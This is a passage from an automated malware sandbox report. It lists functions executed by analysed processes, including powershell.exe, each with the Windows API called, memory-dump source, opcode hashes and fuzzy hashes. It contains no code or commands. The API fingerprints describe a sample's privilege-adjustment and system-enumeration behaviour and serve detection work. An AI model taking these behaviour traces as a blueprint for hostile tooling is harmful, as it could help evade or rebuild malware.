                                                                                            • Opcode ID: dbe5f6479a4f9351483ac090e0130474a68237fff3c772fb82dcdd4977744945
                                                                                            • Instruction ID: f1596c4e53882b9942f3efec8487eb13dcc0f1c08b27cea481609552cd15ea16
                                                                                            • Opcode Fuzzy Hash: dbe5f6479a4f9351483ac090e0130474a68237fff3c772fb82dcdd4977744945
                                                                                            • Instruction Fuzzy Hash: FE01DC79A00714CFEB208F15D885765FBE0EF49724F08C0AADD0A8B752D274A808DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0269ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 50253cede65d05887e74c728594326d364c98cba2b403eb24785681d9f5e674f
                                                                                            • Instruction ID: 56bea54b1db38f9f46515787464b2aee84df85a38f7f95503b737a348f11e9cc
                                                                                            • Opcode Fuzzy Hash: 50253cede65d05887e74c728594326d364c98cba2b403eb24785681d9f5e674f
                                                                                            • Instruction Fuzzy Hash: AB01D171504344CFEF10DF55D8857A1FBE8DF00620F18C0AACD098F306D674A804CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02851116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02851148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 5c8c084a435abf63f0cd7bafb82570c7368aa28ca5eb649a8db41f50105c4725
                                                                                            • Instruction ID: 759325537f15c721e3463f9eab76476dce9ba2646b5338f73f4ddb72739dd6f9
                                                                                            • Opcode Fuzzy Hash: 5c8c084a435abf63f0cd7bafb82570c7368aa28ca5eb649a8db41f50105c4725
                                                                                            • Instruction Fuzzy Hash: C1F0FF3C500744DFEB20CF05D889765FBA0EF00A25F08C0DACD0D8B712C275A448CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0285096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0285099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: e92993977c4a584d4881992ddd7fa0724b041817828f4a633a8890529379c7d2
                                                                                            • Instruction ID: 95ffc6aed2fca9f6f30814aa0d2fc8d1edb1245db9ad07e9ac0ab9c27c7d2a9d
                                                                                            • Opcode Fuzzy Hash: e92993977c4a584d4881992ddd7fa0724b041817828f4a633a8890529379c7d2
                                                                                            • Instruction Fuzzy Hash: 79F0C239904744DFEB20DF05D885765FFA0EF18726F18C09ADD498B71AD375A404CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0269A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 7a467cd95de0ecc3877ad5263c85d27e908795b4009695735582088b86ab07de
                                                                                            • Instruction ID: 21c1b7369a887abfbc457ea0394382e5b1b770e5b9722051d8adec6ab873124c
                                                                                            • Opcode Fuzzy Hash: 7a467cd95de0ecc3877ad5263c85d27e908795b4009695735582088b86ab07de
                                                                                            • Instruction Fuzzy Hash: C0F0CD35904744DFEF20DF46D889765FBE4EF04721F18C09ADD098B712DB75A808CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0269AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 3ec62edcf54126f73b10680da0675e3ba6ead7723cde78d2a9c7734699385673
                                                                                            • Instruction ID: e6d2ca00315f9092585ff75e4c1c6aa0989e3d6c9720d53f79ebebd30d290939
                                                                                            • Opcode Fuzzy Hash: 3ec62edcf54126f73b10680da0675e3ba6ead7723cde78d2a9c7734699385673
                                                                                            • Instruction Fuzzy Hash: DCF0CD31904B44CFEF10CF49DA89761FBE4EF44621F18C09ADD094B352D6B9A904CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0269A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 40152f1ae3b49387730b69eeb401a48e9e3d69ad410bacdc63a91dc86bffe0e4
                                                                                            • Instruction ID: 8a4a22d6479fd0bd115b140994e69ff5a9512ddd9c9ddfb54f43f112c76cd970
                                                                                            • Opcode Fuzzy Hash: 40152f1ae3b49387730b69eeb401a48e9e3d69ad410bacdc63a91dc86bffe0e4
                                                                                            • Instruction Fuzzy Hash: 9911A3715093849FDB11CF25DC45B96FFE4DF02220F0980EBED458B252D275A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0269A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: f17164285b0c856e60a049a91e08089a3f185f6af043c2aea4eb09fa696ed177
                                                                                            • Instruction ID: 7515529814e318a3a3fe4284650a82672a2ae58e63edaffa82ef92e58dd3f26b
                                                                                            • Opcode Fuzzy Hash: f17164285b0c856e60a049a91e08089a3f185f6af043c2aea4eb09fa696ed177
                                                                                            • Instruction Fuzzy Hash: B501DB71A00640CFEF10DF55D8897A6FBE8EF01220F18C0AADD098B742DA75A804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02A807F7, Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2118044830.0000000002A80000.00000040.00000040.sdmp, Offset: 02A80000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 136b7422a33be5a41f9d8eacab5299c6850e8abe7895e43e95678b2cb9255a14
                                                                                            • Instruction ID: bdae7df790acce9003a6d29b328436a08417083cc5e43106db10fa395532ddaa
                                                                                            • Opcode Fuzzy Hash: 136b7422a33be5a41f9d8eacab5299c6850e8abe7895e43e95678b2cb9255a14
                                                                                            • Instruction Fuzzy Hash: 5401D6B2509380AFD711CF16AC45862FFA8DE86570748C49FEC498B612D125A908CB72
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02A8081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2118044830.0000000002A80000.00000040.00000040.sdmp, Offset: 02A80000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c819c4f75256819045162d91eb2cb463397e2016176f18ed3810568ad912954c
                                                                                            • Instruction ID: 6d812ef83775688055efe67d87458cb7d6f968744fb1c446bf312e34d2f3edbe
                                                                                            • Opcode Fuzzy Hash: c819c4f75256819045162d91eb2cb463397e2016176f18ed3810568ad912954c
                                                                                            • Instruction Fuzzy Hash: 19E092B6A047048BDB50CF0AEC41452F7D4EB84A30B18C07FDD0D8B700D135B504CAA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05810861, Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2131168925.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0b6066e00579570ba0d0eaac47ff71356968ebbc8c24757038bc3fe48395d66
                                                                                            • Instruction ID: 5cec9d452460e743b1ed232bda1cfeb17966236acf22d14123876c31e56b73a9
                                                                                            • Opcode Fuzzy Hash: d0b6066e00579570ba0d0eaac47ff71356968ebbc8c24757038bc3fe48395d66
                                                                                            • Instruction Fuzzy Hash: 5BE0462228C3C04FC3025764A8687A5BB765F83158F0A45EBC596CF2A7DB5D8886C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 026923F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117217802.0000000002692000.00000040.00000001.sdmp, Offset: 02692000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8c05e0673cecdb53921c0ede9e9ccdec1e8e21e45143e44cf6ae4acf81f69b30
                                                                                            • Instruction ID: 64d19d4c387296b69303a79fc16966e6921a9e33136705cf1e8418447917fad5
                                                                                            • Opcode Fuzzy Hash: 8c05e0673cecdb53921c0ede9e9ccdec1e8e21e45143e44cf6ae4acf81f69b30
                                                                                            • Instruction Fuzzy Hash: D4D05E79204A819FDB168A1CC1A4B953798AF66B08F4644F9EC40CB7A3CB68E5D1D200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 026923BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117217802.0000000002692000.00000040.00000001.sdmp, Offset: 02692000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f62a620ed180e15a4780167d9818a066d33383ddbe4bb3a22b05b1fe4dbe8c51
                                                                                            • Instruction ID: 803cd23158c9708c44ec97378306ca76dd5f8bccfd648c7cb7fb9063de0b1b70
                                                                                            • Opcode Fuzzy Hash: f62a620ed180e15a4780167d9818a066d33383ddbe4bb3a22b05b1fe4dbe8c51
                                                                                            • Instruction Fuzzy Hash: 8FD05E343006818FDB15CA1CC1A4F5973E8AF40704F0644E9BC008B366C7A4E880C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2928 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 020AACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020AAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: ef5529b6588d10fd9e2c3c8d77d37cb015c7401c3ac696cfb79899d68337b83c
                                                                                            • Instruction ID: 9574705f15921456fc229f6bb2d1b153a01f6e45349ea11948129a3a3624b04c
                                                                                            • Opcode Fuzzy Hash: ef5529b6588d10fd9e2c3c8d77d37cb015c7401c3ac696cfb79899d68337b83c
                                                                                            • Instruction Fuzzy Hash: B121D1765097849FEB238F25DC44B92BFF4EF06310F0884DAE9858B5A3D3319908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020AAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 023a35cc1cdb0acca36610a2a86206d30ea5bf85ef5936884860caa98a9df821
                                                                                            • Instruction ID: df75d919f0bdbc1b86d319c7a57b24da3265360d86b7df47c69a0f0b60288ffe
                                                                                            • Opcode Fuzzy Hash: 023a35cc1cdb0acca36610a2a86206d30ea5bf85ef5936884860caa98a9df821
                                                                                            • Instruction Fuzzy Hash: C111A075600704DFEB21CF95D884B96FBE4EF04621F08C46AED8A8B662D731E414DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020AB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 7db80def727ac076c1da34ef49865d79a1a760de71841d2609ec3363124fba49
                                                                                            • Instruction ID: ae773ef95b0cea417586df2afb07746b7a7061791a4feba19590c172485104a6
                                                                                            • Opcode Fuzzy Hash: 7db80def727ac076c1da34ef49865d79a1a760de71841d2609ec3363124fba49
                                                                                            • Instruction Fuzzy Hash: 0311E032408380AFDB228F11DC45F52FFB0EF06224F08C08AED854B262C275A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020AB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 17466d7f2e9a1b1a8c8ff03d4fa3a85c4c8edaaedd6cf26934eb17295ce286f6
                                                                                            • Instruction ID: a024cfc4f7d360198f743314038b45353b707333d681efefff571f4577f36184
                                                                                            • Opcode Fuzzy Hash: 17466d7f2e9a1b1a8c8ff03d4fa3a85c4c8edaaedd6cf26934eb17295ce286f6
                                                                                            • Instruction Fuzzy Hash: 1001AD36400704DFEB218F85D885B66FFE0EF14725F48C09ADD4A0B612D375A418EB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 98251271a56c91a4df7516d177edd26c800c502dee9b387ba283cf9fa23275a5
                                                                                            • Instruction ID: 34e082bb5665e2bccd60089e1b0d463061ac76e327a5997824cf0a7a1969a7ff
                                                                                            • Opcode Fuzzy Hash: 98251271a56c91a4df7516d177edd26c800c502dee9b387ba283cf9fa23275a5
                                                                                            • Instruction Fuzzy Hash: 4731487650E3C48FE7138B759C65692BFB4AF03210F0E84DBD985CF1A3D6299809DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0284067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 753991380d6950b781f4e2da52a887eacbe1bd4af29b4b2d07d7b1041f8a909b
                                                                                            • Instruction ID: 799e98ab3946a0400bd810fb3232d40f2107946d8d3a638b0d41a7c481abe6d2
                                                                                            • Opcode Fuzzy Hash: 753991380d6950b781f4e2da52a887eacbe1bd4af29b4b2d07d7b1041f8a909b
                                                                                            • Instruction Fuzzy Hash: 08317275505344AFE721CF65CC45F56BFF8EF05210F09849EE989CB292D365A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: a3d3539fdbad15c6aa937f2486df3df2f78512f24f94402f557f1aa015fd2b9b
                                                                                            • Instruction ID: e3330b57a6e86f6619a1556c738c80c2d1af0b596c3306685f31b336e8954ffd
                                                                                            • Opcode Fuzzy Hash: a3d3539fdbad15c6aa937f2486df3df2f78512f24f94402f557f1aa015fd2b9b
                                                                                            • Instruction Fuzzy Hash: F531E875509384AFE712CB25CC45B96BFE8DF06214F0884AAE948CF293D775A909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020ABD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 020ABDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: f9dd62906569ed7ad17410307fe209eb8b2d12c165761b61b9df9a688d586999
                                                                                            • Instruction ID: e7af8cb14a4e246884e5c61a473301528c4848c9c3576d47d3f7a0310ee810bc
                                                                                            • Opcode Fuzzy Hash: f9dd62906569ed7ad17410307fe209eb8b2d12c165761b61b9df9a688d586999
                                                                                            • Instruction Fuzzy Hash: AC31B172409380AFE722CB60CC55F96BFB8EF06210F08849BF985CB192D224A908C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 020AAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 035dadf362b5a6581ed48f5fca09845fc2d4b3a40b3029c7a2df7ca4bd06e433
                                                                                            • Instruction ID: d5f94ae742ef9b20ca1b2ff274ca5d3cb2fb335befa4b4f5a658afbeceb39c83
                                                                                            • Opcode Fuzzy Hash: 035dadf362b5a6581ed48f5fca09845fc2d4b3a40b3029c7a2df7ca4bd06e433
                                                                                            • Instruction Fuzzy Hash: 0B21A2B2509380AFE7128B60DC45F96BFB8EF06324F0884DAE985DB193D265A949C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 6823bf22300dedf1e86c9eb32f974efc85917e6e3317dd28d9a4d9be148a08bc
                                                                                            • Instruction ID: bd2473cc2ed9891e713e818f47b6a6da55452b994d4b8c6e0ae7db5e864223fe
                                                                                            • Opcode Fuzzy Hash: 6823bf22300dedf1e86c9eb32f974efc85917e6e3317dd28d9a4d9be148a08bc
                                                                                            • Instruction Fuzzy Hash: 0D316F7550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD8858F2A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 020AB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 841135034a62ca3e1fc70dec28f1fdcccbb573295addef0190d2e044aa327c8e
                                                                                            • Instruction ID: f41b1a8a4be31b4018afe041256652b6d5a832e8bf4e347fe847e8c6ad98f437
                                                                                            • Opcode Fuzzy Hash: 841135034a62ca3e1fc70dec28f1fdcccbb573295addef0190d2e044aa327c8e
                                                                                            • Instruction Fuzzy Hash: E521A371509380AFE722CF65CC55FA6BFB8EF06224F08849AF945DB152D664E908CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumWindows.USER32(?,00000E9C,?,?), ref: 020AA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2113788470.00000000020AA000.00000040.00000001.sdmp, Offset: 020AA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1129996299-0
                                                                                            • Opcode ID: 8e4f32f3901975bd65530552df1b230ffe0185eddf8613f501ef12e50ab3e0f5
                                                                                            • Instruction ID: 98eda675ebe1db5e39c6b5015c9e1bdc7b3eb74742b6e7df73541628fb43c3fc
                                                                                            • Opcode Fuzzy Hash: 8e4f32f3901975bd65530552df1b230ffe0185eddf8613f501ef12e50ab3e0f5
                                                                                            • Instruction Fuzzy Hash: 6D21B27180D3C16FD312CB258C55B66BFB4EF47620F1981DBE884CB693D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 02840819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 8e4886556feb73ec4eef2b67afe92ee828964b96c9130a89263af75432211643
                                                                                            • Instruction ID: 5274b3fe10070cc9e95833ac1784b2da22d6602601f637211bf0d4f7e19e471b
                                                                                            • Opcode Fuzzy Hash: 8e4886556feb73ec4eef2b67afe92ee828964b96c9130a89263af75432211643
                                                                                            • Instruction Fuzzy Hash: 4D212C76408784AFE712CB159C41FA3BFA8EF46720F0881DBF9858F193D224A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 716630e599102dc8536492117c1f2e0edb62657ccf1e28ee6e216b71365f7fe5
                                                                                            • Instruction ID: 482a7b48bae1cb2c801c4a1f206bf3dd6ddeb477fb127ef39aa6a951a311473d
                                                                                            • Opcode Fuzzy Hash: 716630e599102dc8536492117c1f2e0edb62657ccf1e28ee6e216b71365f7fe5
                                                                                            • Instruction Fuzzy Hash: 5E217F7540E3C0AFD3128B758C55B66BFB4EF47610F1A81CBD8848F6A3D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 11c7620b033f3ce5574ba876f2edfc64feb32199d2a979b3d795d5b27f016493
                                                                                            • Instruction ID: 3e84c66553bee6c533f279e8d32ab2560f9f3f764b063abab9118e997f29a2b5
                                                                                            • Opcode Fuzzy Hash: 11c7620b033f3ce5574ba876f2edfc64feb32199d2a979b3d795d5b27f016493
                                                                                            • Instruction Fuzzy Hash: E2218175500704EFE721DF65CC85F66FBE8EF08650F14846AEA49CB292D771E904CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02840854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FFCD1502,00000000,00000000,00000000,00000000), ref: 028408E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2117055471.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: dbc178bcadc9ee4f23bf9bf45e57793ed784020998f74017d3c27c589b2a975d
                                                                                            • Instruction ID: fc172cb65a3a4e164c9251bd26a18defe4f87315cf1ce7f70142e365e45e819a
                                                                                            • Opcode Fuzzy Hash: dbc178bcadc9ee4f23bf9bf45e57793ed784020998f74017d3c27c589b2a975d
                                                                                            • Instruction Fuzzy Hash: A321B275409380AFE722CF50DC45F56FFB8EF06310F09849BE9458B153C225A909CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 020AA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 020AA94A
